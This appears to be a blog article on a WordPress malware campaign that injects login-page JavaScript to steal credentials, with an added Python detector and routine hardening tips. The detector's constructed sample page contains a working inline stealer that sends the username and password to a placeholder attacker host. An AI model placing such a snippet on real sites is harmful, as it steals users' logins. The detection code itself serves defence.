According to a report from CodeGuard, WordPress now powers 79% of content-driven websites. By comparison, Joomla powers 7.2%, and Drupal 5.3%. The report further notes that designers and developers are flocking to the platform in droves; it’s gained more popularity in that market than it has among bloggers.
That popularity is a double-edged sword. On the one hand, the volume of WordPress users means more plugins, more themes, and better support. On the other, it also makes the platform that much more attractive a target for cyber-criminals.
To that end, there’s a distressing new type of attack making the rounds on the web – a piece of malware, to be precise. What makes it so problematic is that it doesn’t behave like any other WordPress malware. It doesn’t try to install anything on a user’s machine.
It attempts to steal the user’s login credentials instead.
“When unsuspecting users attempt to log in to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page,” explains Zscaler, the firm which first broke news of the malware. “The end user is oblivious to the fact that the credentials were leaked to a remote attacker’s site, as he is redirected to a successful logged-in session.”
I’d imagine there will be a fix for this vulnerability coming in short order. At the moment, however, the only defense against the infection is due diligence. Website owners can also check whether their site is compromised by searching for the injected code.
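One way to run that check, as an added example that is not part of the original article or Zscaler’s write-up: the script below parses a saved copy of a login page and flags script tags matching the injection the article describes, an inline script that reads the login fields and sends them elsewhere, or a script loaded from a host other than the site’s own. It assumes the site serves its legitimate scripts from its own hostname; example-blog.test and attacker-host.invalid are constructed placeholders, and a finding means “review this,” not proof of compromise.

```python
# Added example (not the article's or Zscaler's code): flag script tags on a
# WordPress login page that look injected. Assumes the site's own scripts come
# from its own hostname; the sample page below is constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# An inline stealer must read the wp-login fields and get them off the page.
FIELD_REFS = re.compile(r"user_login|user_pass|['\"](?:log|pwd)['\"]")
NET_CALLS = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|\.src\s*=|https?://")

class ScriptCollector(HTMLParser):
    """Collects every <script> tag as (src attribute or None, inline body)."""
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script, self._src, self._buf = [], False, None, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._src, self._buf = True, dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False

def find_injected_scripts(page_html, site_host):
    """Return (reason, evidence) pairs for scripts that warrant a closer look."""
    parser = ScriptCollector()
    parser.feed(page_html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = urlparse(src).hostname
            if host and host != site_host:
                findings.append(("script loaded from foreign host " + host, src))
        elif FIELD_REFS.search(body) and NET_CALLS.search(body):
            findings.append(("inline script reads login fields and sends data", body.strip()[:60]))
    return findings

# Constructed wp-login.php page: one first-party script, one injected stealer.
SAMPLE_LOGIN_PAGE = """<html><head>
<script src="https://example-blog.test/wp-includes/js/jquery.js"></script>
<script>document.getElementById('loginform').onsubmit = function () {
  var u = document.getElementById('user_login').value, p = document.getElementById('user_pass').value;
  (new Image()).src = 'https://attacker-host.invalid/c?u=' + u + '&p=' + p; };</script>
</head><body><form id="loginform" action="/wp-login.php" method="post">
<input name="log" id="user_login"><input name="pwd" id="user_pass" type="password"></form></body></html>"""
```

Run it against the HTML your browser actually receives for wp-login.php (view source or a saved copy), since the injection is served with the page rather than being visible in the dashboard.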
It’s the same old song and dance we’ve heard a thousand times before. This time it’s malware. Last week, it was a plugin vulnerability. Then a glitch. Then more malware. Then brute forcing. Then…
You get the idea. WordPress attacks and vulnerabilities surface with such frequency, one can’t help but wonder why anyone uses the platform at all. Is ease of use really worth the security risks?
Honestly, the risks aren’t as great as everyone makes them out to be. The reason we see so many vulnerabilities on WordPress – the reason it’s targeted so frequently – is its popularity. That’s it. If it were Joomla or Drupal in WordPress’s place, it’d be the same story.
Of course, just because the vulnerabilities aren’t as pronounced as everyone makes them out to be doesn’t mean you shouldn’t be taking measures to keep your site secure. You should be doing everything in your power to do so, actually. There are a few steps involved in this:
- Be Proactive: Don’t wait to update. Install patches, hotfixes, and new versions as soon as humanly possible. They were released for a reason, after all.
- Be Smart: Use strong passwords, and never use the same credentials for one site as you do for another. Make sure you install antivirus software on your site, and be sure to regularly check it for unusual behavior.
- Be Discerning: Avoid installing plugins or themes from unregulated, third-party sites – and never pirate premium plugins and themes. That’s just inviting your site to get infected.
- Be Informed: Follow the news to keep yourself apprised of newly-discovered vulnerabilities and attacks. Know how people are likely to attack your site, and how you can defend yourself.
WordPress is the most popular content management system in the world – which means it’s also the most popular target for criminals. As a website owner, it falls to you to make sure your own site isn’t an attractive target. Take charge of your security, or you’ll have only yourself to blame if your site gets compromised.